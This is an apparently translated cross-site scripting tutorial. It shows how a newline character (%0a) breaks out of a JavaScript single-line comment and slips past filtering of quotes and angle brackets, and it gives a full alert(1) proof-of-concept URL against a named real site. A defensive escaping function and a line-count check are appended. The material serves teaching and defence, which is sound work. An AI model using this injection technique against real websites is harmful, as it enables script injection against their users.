In some cases, all we need to bypass the filtering is a line break. It reminds double quotation marks and angle brackets that "they are not the only symbols in the fight".
1. The actual scenario is as follows.
http://datalib.games.qq.com/cgi-bin/search?libid=178&FilterAttrAND=3602&FilterValueAND=aaaaaaaaaa
Correspondingly, let's see at which output points the input aaaaaaaaaa appears on the page.
2. Good. There are five output points in total, between HTML tags (see Tutorial 1) and between <script>...</script>. However, < and > are filtered, and " is filtered out as well.
3. That is to say, the traditional approach is no longer enough. Let's continue to look at the other five places. Ah, there is still a large comment, and our [output] is displayed inside it too.
4. Well, would this work?
// I am a comment. I love taking baths, oh~ oh~ oh~ [I am the output]
What if you can use a line break?
// I am a comment. I love taking baths, oh~ oh~ oh~ [I am the output<line break>
alert(1);// I am the output]
In this way, alert(1); is successfully executed, because the line break ends the single-line comment and everything after it is treated as code.
5. Well, with such an idea, it is not difficult to construct the following exploit.
http://datalib.games.qq.com/cgi-bin/search?libid=178&FilterAttrAND=3602&FilterValueAND=%0aalert(1);//
Check the output. Hey, no filtering.
6. In this way, our line break succeeds this time. It is a symbol in the fight too!
Solution:
Try not to output user-controlled content inside JS comments. It is quite dangerous.
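To make the mechanism from step 4 and the solution concrete, here is an added example that is not part of the original tutorial. It models the vulnerable template schematically (a search term dropped verbatim into a // comment), then shows the escaping a defender would apply if input must land inside a script block at all: every JavaScript line terminator (\r, \n, U+2028, U+2029) plus quotes and angle brackets is rewritten as a \uXXXX escape, so the comment can never be closed by the input. The function and parameter names are hypothetical, and the sample input is constructed to mirror the tutorial's %0aalert(1);// payload.

```javascript
// Added example, not code from the original page. Names are hypothetical.

// Schematic version of the vulnerable template: the search term is echoed
// verbatim inside a single-line JavaScript comment.
function renderUnsafe(userInput) {
  return "// search term: " + userInput + " (end of comment)";
}

// Escape every character that can terminate a `//` comment, a string literal
// or the <script> block itself. JavaScript treats \n, \r, U+2028 and U+2029
// as line terminators, so all four must be neutralised, not just \n.
function escapeForJs(str) {
  return str.replace(/[\\"'<>\r\n\u2028\u2029]/g, (ch) => {
    const hex = ch.charCodeAt(0).toString(16).padStart(4, "0");
    return "\\u" + hex;
  });
}

// Hardened version of the same template.
function renderSafe(userInput) {
  return "// search term: " + escapeForJs(userInput) + " (end of comment)";
}

// Count the physical lines of the rendered script fragment. A `//` comment
// that spans more than one line means the remainder is live code.
function lineCount(js) {
  return js.split(/\r\n|\r|\n|\u2028|\u2029/).length;
}

// Constructed sample input, mirroring the tutorial's `%0aalert(1);//`.
const sample = "\nalert(1);//";
console.log(renderUnsafe(sample));
console.log("unsafe line count:", lineCount(renderUnsafe(sample))); // 2
console.log(renderSafe(sample));
console.log("safe line count:", lineCount(renderSafe(sample)));     // 1
```

The line count is the useful check here: if a template ever produces more than one line from a single // comment, user input has broken out of it. Escaping is a fallback; the primary fix remains the one the tutorial gives, which is not to echo input inside comments in the first place.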